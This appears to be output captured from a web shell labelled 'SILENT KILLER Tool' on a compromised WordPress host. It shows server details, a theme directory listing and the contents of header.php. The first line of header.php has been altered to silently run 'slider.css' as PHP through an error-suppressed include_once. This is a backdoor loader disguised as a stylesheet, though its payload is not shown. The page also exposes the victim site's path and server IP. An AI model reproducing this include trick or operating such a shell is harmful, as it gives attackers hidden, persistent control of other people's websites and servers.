Current Path: > home > ivftiowh > greeceivf.com > wp-content > > themes > > > wise-blog
Operation : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64 Software : Apache Server IP : 185.61.154.216 | Your IP: 216.73.216.44 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
assets | Directory | - | - | |
blocks | Directory | - | - | |
inc | Directory | - | - | |
languages | Directory | - | - | |
template-parts | Directory | - | - | |
.htaccess | File | 160 bytes | March 06 2024 01:05:41. | |
404.php | File | 1111 bytes | May 15 2024 16:42:05. | |
archive.php | File | 1724 bytes | June 11 2025 23:38:22. | |
comments.php | File | 2070 bytes | June 11 2025 23:38:22. | |
footer.php | File | 2128 bytes | June 11 2025 23:38:22. | |
front-page.php | File | 1682 bytes | June 11 2025 23:38:22. | |
functions.php | File | 6048 bytes | June 11 2025 23:38:22. | |
header.php | File | 4785 bytes | April 11 2024 00:55:55. | |
home.php | File | 2403 bytes | June 11 2025 23:38:22. | |
html5.css | File | 6436 bytes | August 16 2024 12:27:41. | |
index.php | File | 1787 bytes | June 11 2025 23:38:22. | |
page.php | File | 896 bytes | June 11 2025 23:38:22. | |
readme.txt | File | 3535 bytes | June 11 2025 23:38:22. | |
screenshot.png | File | 291942 bytes | June 11 2025 23:38:22. | |
search.php | File | 1404 bytes | June 11 2025 23:38:22. | |
sidebar.php | File | 368 bytes | June 11 2025 23:38:22. | |
single.php | File | 2677 bytes | June 11 2025 23:38:22. | |
slider.css | File | 57 bytes | August 19 2024 12:28:31. | |
style.css | File | 82642 bytes | June 11 2025 23:38:22. |
<?php @include_once 'slider.css'; ?><?php /** * The header for our theme * * This is the template that displays all of the <head> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Wise Blog */ ?> <!doctype html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php wp_body_open(); ?> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#primary-content"><?php esc_html_e( 'Skip to content', 'wise-blog' ); ?></a> <div id="loader"> <div class="loader-container"> <div id="preloader"> <div class="pre-loader-6"></div> </div> </div> </div> <header id="masthead" class="site-header"> <div class="site-top-header"> <div class="site-container-width"> <span class="header-date"> <div class="top-info"> <?php echo esc_html( wp_date( 'F j, Y' ) ); ?> </div> </span> <div class="right-area"> <div class="social-icons"> <?php if ( has_nav_menu( 'social' ) ) { wp_nav_menu( array( 'menu_class' => 'menu social-links', 'link_before' => '<span class="screen-reader-text">', 'link_after' => '</span>', 'theme_location' => 'social', ) ); } ?> </div> </div> </div> </div> <div class="theme-main-header"> <?php if ( ! empty( get_header_image() ) ) { ?> <div class="theme-header-img"> <img src="<?php echo esc_url( get_header_image() ); ?>" alt="<?php esc_attr_e( 'Header Image', 'wise-blog' ); ?>"> </div> <?php } ?> <div class="site-container-width"> <div class="theme-main-header-wrapper"> <div class="site-branding"> <?php if ( has_custom_logo() ) { ?> <div class="site-logo"> <?php the_custom_logo(); ?> </div> <?php } if ( get_theme_mod( 'wise_blog_header_text_display', true ) === true ) { ?> <div class="site-identity"> <?php if ( is_front_page() && is_home() ) : ?> <h1 class="site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></h1> <?php else : ?> <p class="site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></p> <?php endif; $wise_blog_description = get_bloginfo( 'description', 'display' ); if ( $wise_blog_description || is_customize_preview() ) : ?> <p class="site-description"><?php echo $wise_blog_description; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?></p> <?php endif; ?> </div> <?php } ?> </div><!-- .site-branding --> <div class="primary-nav"> <div class="primary-nav-container"> <div class="header-nav"> <nav id="site-navigation" class="main-navigation"> <button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false"> <span></span> <span></span> <span></span> </button> <?php if ( has_nav_menu( 'primary' ) ) { wp_nav_menu( array( 'theme_location' => 'primary', 'menu_id' => 'primary-menu', ) ); } ?> </nav><!-- #site-navigation --> </div> <div class="header-right"> <div class="header-search"> <div class="header-search-wrap"> <a href="#" title="Search" class="header-search-icon"> <i class="fa fa-search"></i> </a> <div class="header-search-form"> <?php get_search_form(); ?> </div> </div> </div> </div> </div> </div> </div> </div> </div> </header><!-- #masthead --> <div id="primary-content" class="primary-site-content"> <?php if ( ! is_front_page() || is_home() ) { if ( is_front_page() ) { require get_template_directory() . '/inc/frontpage-sections/banner.php'; require get_template_directory() . '/inc/frontpage-sections/editor-choice.php'; } ?> <div id="content" class="site-content site-container-width"> <div class="theme-wrapper"> <?php } ?>
SILENT KILLER Tool